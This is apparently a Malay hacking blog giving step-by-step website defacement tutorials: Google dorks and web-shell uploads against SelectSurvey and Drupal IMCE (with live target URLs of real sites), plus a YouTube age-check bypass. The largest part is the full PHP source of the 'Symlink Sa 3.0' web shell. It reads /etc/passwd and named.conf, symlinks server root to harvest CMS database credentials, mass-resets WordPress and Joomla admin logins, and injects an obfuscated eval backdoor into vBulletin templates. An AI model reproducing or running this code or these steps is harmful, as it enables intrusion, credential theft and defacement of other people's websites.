This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Thursday 21 March 2013

Select Survey CMS File Upload Deface

Cara deface hack website file upload shell

Assalamualaikum dan salam sejahtera.Entry hari ini aku nak ajar exploit SelectSurvey CMS. CMS ini adalah dari ASP.NET.
Exploit ini membolehkan korang upload shell .asp.

Ok jom mula.


1. Mula-mula cari website vuln dengan google dork :

  • "SelectSurvey.NETv4 site:uk"
  • "SelectSurvey.NETv4"


note : main2 dengan dork untuk dapat result yang banyak.

2. Pilih salah satu website dari result.

3. Tambah di hujung url website yang korang pilih :

/survey/UploadImagePopup.aspx


atau jika website tersebut menggunakan subdomain, url akan jadi macam ni :

http://survey.site.com/UploadImagePopup.aspx



Selepas itu, paparan website tu akan jadi lebih kurang macam ni :



Click Choose File dan pilih shell.asp korang.
Kemudian Upload.


note : dapatkan shell asp.rujuk entry INI

3. Kalau berjaya, akan keluar macam ini :



Kalau tak berjaya, korang tukar extension shell jadi shell.asp.jpg atau extension lain.Kalau tak boleh jugak, cari website lain.

4. Ok sekarang masa untuk tengok hasil shell yang dah di upload.
Cuma tambah di hujung url :


http://www.site.com/UploadedImages/shell.asp

shell.asp tu adalah nama shell korang.


Itu saja selamat berjaya :D

Drupal IMCE Mkdir Remote File Upload

Deface dengan exploit drupal deface

Assalamualaikum dan salam sejahtera.Dah lama aku tak buat post exploit deface kan? Ok hari ini aku nak ajar korang satu exploit deface di bawah platform Drupal.
Sebenarnya exploit ni dah lama tapi masih banyak website yang terdedah kepada exploit ni termasuk web yang baru-baru :D

OK jom mula~

1. Mula-mula cari web vuln dengan google dork :
inurl:"/imce?dir="
intitle:"File Browser"


note : ubah2 dork untuk dapat bnyak web :D

2. Kemudian buka website yang korang dapat dari google.

Akan keluar paparan macam ini :



Ok korang tengok di sebelah kiri web tu, ada folder2.Korang boleh ubah nak upload masuk folder mana.Tapi lebih baik ambil folder yang atas sekali iaitu files.


atau tukar hujung link website jadi /imce?dir=.

3. Kemudian klik UPLOAD dan pilih la file shell korang!
Extension yang dibenarkan : .php/.html/.pgs/.asp/shell.asp;me


Extension ni bergantung kepada website.ada yang boleh ada yang tak boleh.Korang tukar2 nama shell untuk bagi lepas :D

4. Selepas dah berjaya upload, untuk tengok hasil macam ni :

http://target.com/files/shell.php

http://target.com/path/shell.php

note : /path/ tu ikut kepada website.dia lain2 nama dia.ada yang tak ada dan ada yang ada.

Symlink Sa 3.0


Symlink_Sa 3.0. Shell ini dibuat oleh Sec-w.com. 
Features :
-> Symlink Bypass
-> Bypass Read
-> Mass Joomla Symlink
-> Masswordpress SymlinkMass
-> vBulletin Symlink
Dan banyak lagi.


<?php
set_time_limit(0);
error_reporting(0);
$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = explode("/",$pageURL );
$pageURL =str_replace($u[count($u)-1],"",$pageURL );
$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
$u = explode("/",$pageFTP );
$pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
?>
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Symlink_Sa 3.0</title>
<style type="text/css">
 html,body {
    margin: 0;
    padding: 0;
    outline: 0;
}
a{

font-size: 13px;

}


body {
   direction: ltr;
   background-color:#F4F4F4;
    color: rgb(153, 153, 153);
   text-align: center
}



input,textarea,select{
font-weight: bold;
color: #000000;
}

input,textarea,select:hover{
box-shadow: 0px 0px 4px #AAAAAA;
}


.hedr {
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 22px;


}

.cont a{

text-decoration: none;
color:rgb(153, 153, 153);
font-family: Tahoma, Arial, sans-serif  ;
font-size: 16px;
text-shadow: 0px 0px 3px ;
}

.cont a:hover{


 color: #EEEEEE ;
 text-shadow:0px 0px 3px #000000 ;


}

.tmp tr td{

border: solid 1px #BBBBBB;

padding: 2px ;
 font-size: 13px;
}

.tmp tr td a {
 text-decoration: none;



}

.foter{
 font-size: 9pt;
 color: #AAAAAA ;
 text-align: center
}

.tmp tr td:hover{

box-shadow: 0px 0px 4px #888888;

}
.fot{

font-family:Tahoma, Arial, sans-serif;

 font-size: 11pt;
}
.for a : hover{

text-shadow: 0px 0px 1px #3366FF;

}


.ir {
 color: #FF0000;
}
</style>
</head>
<body>
<div class='all'>
<?php

@mkdir('sym',0777);
$htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f =@fopen ('sym/.htaccess','w');
fwrite($f , $htcs);



@symlink("/","sym/root");

$pg = basename(__FILE__);

echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;

echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;

echo '<div class="cont">

[<a href="?"> Home </a>]

[<a href="?sws=sym"> User & Domains & Symlink </a>]

[<a href="?sws=sec"> Domains & Script </a>]

[ <a href="?sws=file"> Symlink File </a>]

[<a href="?sws=passwd"> Symlink Bypass </a>]

<br /><br />

[ <a href="?sws=read"> Bypass Read </a>]

[ <a href="?sws=joomla"> Mass Joomla </a>]

[ <a href="?sws=wp"> Mass WordPress </a>]

[ <a href="?sws=vb"> Mass vBulletin </a>]

[ <a href="?sws=help"> Help </a>]

<br /><br /><br />






</div>';

if(isset($_REQUEST['sws']))
{

switch ($_REQUEST['sws'])
{





/// Domains + Scripts  ///

case 'sec':

if(!@is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

               die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<table align='center' width='40%'><td> Domains </td><td> Script </td>";
foreach($d00m as $dom){

flush();
flush();



if(eregi("zone",$dom)){

@preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(@strlen(trim($domsws[1][0])) > 2){

$user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=@get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=@get_headers($wp2);
$wp12=$wpp2[0];

///////////////////////////////

$jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$joo=@get_headers($jo1);
$jo=$joo[0];


$jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$joo2=@get_headers($jo2);
$jo12=$joo2[0];

////////////////////////////////

$vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
$vbb=@get_headers($vb1);
$vb=$vbb[0];

$vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
$vbb2=@get_headers($vb2);
$vb12=$vbb2[0];

$vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
$vbb3=@get_headers($vb3);
$vb13=$vbb3[0];

/////////////////

$wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
$whh2= @get_headers($wh1);
$wh=$whh2[0];

$wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
$whh2= @get_headers($wh2);
$wh12=$whh2[0];

$wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh3= @get_headers($wh3);
$wh13=$whh3[0];

$wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
$whh5= @get_headers($wh5);
$wh15=$whh5[0];

$wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh4= @get_headers($wh4);
$wh14=$whh4[0];



////////////////////////////////////////////////////////////////////////////////

////////// Wordpress ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
$config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
}
elseif (strpos($wp12, "200") == true)
{
 $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
}

///////////WHMCS////////

elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
{
 $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";

}
elseif (strpos($wh12, "200")  == true)
{
 $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
}

elseif (strpos($wh13, "200")  == true)
{
 $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";

}

///////// Joomla to 4 ///////////

elseif (strpos($jo, "200")  == true)
{
 $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
}

elseif (strpos($jo12, "200")  == true)
{
 $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
}

//////////vBulletin to 4 ///////////

elseif (strpos($vb, "200")  == true)
{
 $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb12, "200")  == true)
{
 $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb13, "200")  == true)
{
 $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
}

else
{
continue;
}
flush();
flush();

/////////////////////////////////////////////////////////////////////////////////////



$site = $user['name'] ;



flush();

echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
<td>".$config."</td></tr>"; flush();

}
}
}
}




break;


/// user + domine + symlink  ///

case 'sym':

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

               die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

flush();



$site = $user['name'] ;


@symlink("/","sym/root");

$site = $domsws[1][0];

$ir = 'ir';

$il = 'il';

if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
{
$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
}


echo "
<tr>

<td>
<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
</td>


<td>
".$user['name']."
</td>






<td>
<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
</td>


</tr></div> ";


flush();
flush();

}
}
}
}




break;


/// file  symlink ///

case 'file':

echo'
The file path to symlink

<br /><br />
<form method="post">
<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
<input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
<input type="submit" value="symlink" name="symlink" /> <br /><br />



</form>
';

$pfile = $_POST['file'];
$symfile = $_POST['symfile'];
$symlink = $_POST['symlink'];

if ($symlink)
{


@mkdir('sym1',0777);
$c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
$f =@fopen ('sym1/.htaccess','w');
@fwrite($f , $c);

@symlink("$pfile","sym1/$symfile");

echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';

}



break;

/// bypass read

case 'read':

echo "read /etc/named.conf";
echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
flush();
flush();


$file = '/etc/named.conf';


$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
else if (!$r3ad)
{
$r3ad = @show_source($file) ;
}
else if (!$r3ad)
{
$r3ad = @highlight_file($file);
}
else if (!$r3ad)
{
$sm = @symlink($file,'sym.txt');


if ($sm){
$r3ad = @fopen('sym/sym.txt', 'r');
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";

}
}



echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";


if(isset($_GET['save'])){


$cont = stripcslashes($_POST['file']);

$f = fopen('named.txt','w');

$w = fwrite($f,$cont);

                 if($w){

                 echo '<br />save has been successfully';

                 }

fclose($f);




}



break;

// passwd

case 'passwd':

if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){


$cont = stripcslashes($_POST['file']);

if(!file_exists('passwd.txt')){

$f = @fopen('passwd.txt','w');

$w = @fwrite($f,$cont);

fclose($f);
}
if($w or @filesize('passwd.txt') > 0){
// * SHOW * //

echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
flush();

$fil3 = file('passwd.txt');

foreach ($fil3 as $f){

    $u=explode(':', $f);
    $user = $u['0'];



echo "
<tr>



<td width='15%'>
$user
</td>






<td width='10%'>
<a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
</td>

<td width='10%'>
<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
</td>



</tr></div> ";


flush();
flush();


}






die ("</tr></div>");


                 }





}



echo "read /etc/passwd";
echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
flush();

$file = '/etc/passwd';


$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
elseif(!$r3ad)
{
$r3ad = @show_source($file) ;
}
elseif(!$r3ad)
{
$r3ad = @highlight_file($file);
}
elseif(!$r3ad)
{

                                           for($uid=0;$uid<1000;$uid++){
                                            $ara = posix_getpwuid($uid);
                                              if (!empty($ara)) {
                                                 while (list ($key, $val) = each($ara)){
                                                   print "$val:";
                                                 }
                                                 print "\n";
                                                }

                                       }

}


flush();


echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
flush();

break;



case 'joomla':

/////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////


if(isset($_POST['s'])){

$file = @file_get_contents('joomla.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('JConfig',$readconfig)){



$pass    =  ex($readconfig,'$password = \'',"';");

$userdb  =  ex($readconfig,'$user = \'',"';");

$db      =  ex($readconfig,'$db = \'',"';");

$fix     =  ex($readconfig,'$dbprefix = \'',"';");

$tab     =  $fix.'users';


$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$query   = @mysql_query("UPDATE `$tab`  SET `username` ='admin'");


$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='9cdfb439c7876e703e307864c9167a15'");


if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [admin] pass [lol]</b>';}else{$r = '<b style="color:red">failed</b>';}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
flush();



}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
flush();

}

}









die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

flush();


}else{

$d00m = file("named.txt");


}
if(!$d00m)
{

               die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=joomla'>
<input type='submit' value='Mass ching Admin' />
<input type='hidden' value='1' name='s' />
</form><br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('joomla.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


////////// joomla ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
$config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
 $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
 $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";





flush();


}
}
}
}


break;

case 'wp':

############################ index #########################3






########  admin ##########33

if(isset($_POST['s'])){

$file = @file_get_contents('wp.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('wp-settings.php',$readconfig)){



$pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");

$userdb  =  ex($readconfig,"define('DB_USER', '","');");

$db      =  ex($readconfig,"define('DB_NAME', '","');");

$fix     =  ex($readconfig,'$table_prefix  = \'',"';");

$tab     = $fix.'users';

$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;

$query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;



if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}

else

{

$r = '<b style="color:red">failed</b>';

}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";

flush();
flush();






}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";

flush();
flush();

}

}










die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

               die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=wp'>
<input type='submit' value='Mass Change Admin' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

flush();
flush();

$f = fopen('wp.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


////////// wp ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
$config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
 $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
 $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";
flush();
flush();





flush();


}
}
}
}


break;


case 'vb':


if(isset($_POST['s'])){



$file = @file_get_contents('vb.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('vBulletin',$readconfig)){



$db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");

$userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");

$pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");

$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheu​MdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;

$crypt  = "{\${eval(gzinflate(base64_decode(\'";

$crypt .= "$shell";

$crypt .= "\')))}}{\${exit()}}</textarea>";

$sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;

$query  = @mysql_query($sqlfaq,$con);



if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}

else

{

$r = '<b style="color:red">failed</b>';

}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";







}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
}

}










die();

}

if(!is_file('named.txt')){

$d00m = file("/etc/named.conf");

}else{

$d00m = file("named.txt");


}
if(!$d00m)
{

               die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=vb'>
<input type='submit' value='Inject shell' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('vb.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


////////// vb ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
$config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
 $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
 $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";





flush();


}
}
}
}








break;

case 'help':

echo "<div class='tmp'>
<table align='center' width='40%'><td>function</td><td>Case</td>";


$safe_mode = ini_get('safe_mode');
    if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>Safe Mode</td><td>$r</td>";

$fun = function_exists('symlink');
    if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function symlink</td><td>$r</td>";


$fun = function_exists('file');
    if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function file</td><td>$r</td>";

$fun = function_exists('file_get_contents');
    if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function file_get_contents</td><td>$r</td>";

$fun = function_exists('mkdir');
    if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function mkdir</td><td>$r</td>";


$fun = is_dir('sym/root');
    if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>Permission denied</td><td>$r</td>";


$fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
    if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}

echo "<tr><td>Forbidden</td><td>$r</td>";




echo "</table></div>";



break;
default:
header("Location: $pg");




}


/// home ///
}else
{


echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
    else { echo '<br /><br />Not uploaded !!<br><br>'; }


}

   echo '
<br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
<br /><br />
<b style="color: red";>   Sec-w.Com  </b>
<br /><br />
Muslims Hackers</div> ';

}


function ex($text,$a,$b){
$explode = explode($a,$text);
$explode = explode($b,$explode[1]);
return $explode[0];
}



echo '</div>

<a style="text-decoration: none; color: #F4F4F4;" title="?§?„?­?…?§???‡"/href="http://sec-w.com/cc">?§?„?­?…?§???‡</a>

<a style="text-decoration: none; color: #F4F4F4;" title="???§?„?… ?§?„?­?…?§???‡"/href="http://sec-w.com/cc">???§?„?… ?§?„?­?…?§???‡</a>



</body>

</html>
';

?>

Bypass 18+ Di Dalam Youtube

Rujuk gambar di bawah

Mesti korang pernah kene bende ni kan ? so macam mana nak bypass ?

Ok . Jum mulakan .

Ok . korang tengok Link dia macam ni

Link:
http://www.youtube.com/watch?v=1Lu0qhRrIow .Korang ambil ID video tu sahaja 1Lu0qhRrIow

Korang ambil Link NI

http://www.youtube.com/v/Masukan ID?fs=1&amp

Di tempat "Masukan ID" korang masukan ID video yang diblock tadi

Contoh Untuk Link Video di Atas :

http://www.youtube.com/v/1Lu0qhRrIow?fs=1&amp

Masukkan Dalam Address bar dan enjoy the video .

Cara Deface Hack Website File Upload Shell



Assalamualaikum dan salam sejahtera. Hari ni HMCA nak ajar exploit SelectSurvey CMS. CMS ini adalah dari ASP.NET.
Exploit ini membolehkan korang upload shell .asp.

Ok jom mula.

1. Mula-mula cari website vuln dengan google dork :

"SelectSurvey.NETv4 site:uk"
"SelectSurvey.NETv4"

note : main2 dengan dork untuk dapat result yang banyak.

2. Pilih salah satu website dari result.

3. Tambah di hujung url website yang korang pilih :

/survey/UploadImagePopup.aspx

atau jika website tersebut menggunakan subdomain, url akan jadi macam ni :

http://survey.site.com/UploadImagePopup.aspx

Selepas itu, paparan website tu akan jadi lebih kurang macam ni :



Click Choose File dan pilih shell.asp korang.
Kemudian Upload.

note : dapatkan shell asp.rujuk entry INI

3. Kalau berjaya, akan keluar macam ini :




Kalau tak berjaya, korang tukar extension shell jadi shell.asp.jpg atau extension lain.Kalau tak boleh jugak, cari website lain.

4. Ok sekarang masa untuk tengok hasil shell yang dah di upload.
Cuma tambah di hujung url :

http://www.site.com/UploadedImages/shell.asp
shell.asp tu adalah nama shell korang.


Itu saja selamat berjaya :D


Live Demo :

https://intranet.yorksj.ac.uk/Survey/UploadImagePopup.aspx
http://survey.mywisenet.com.au/UploadImagePopup.aspx

Tutorial Bypass Symlink Forbidden




Assalamualaikum dan salam sejahtera. hari ni HMCA nak ajar cara nakbypass symlink forbidden.mesti korang pernah dapat symlink penat2, tiba2 bila nak bukak file config tu keluar forbidden kan?
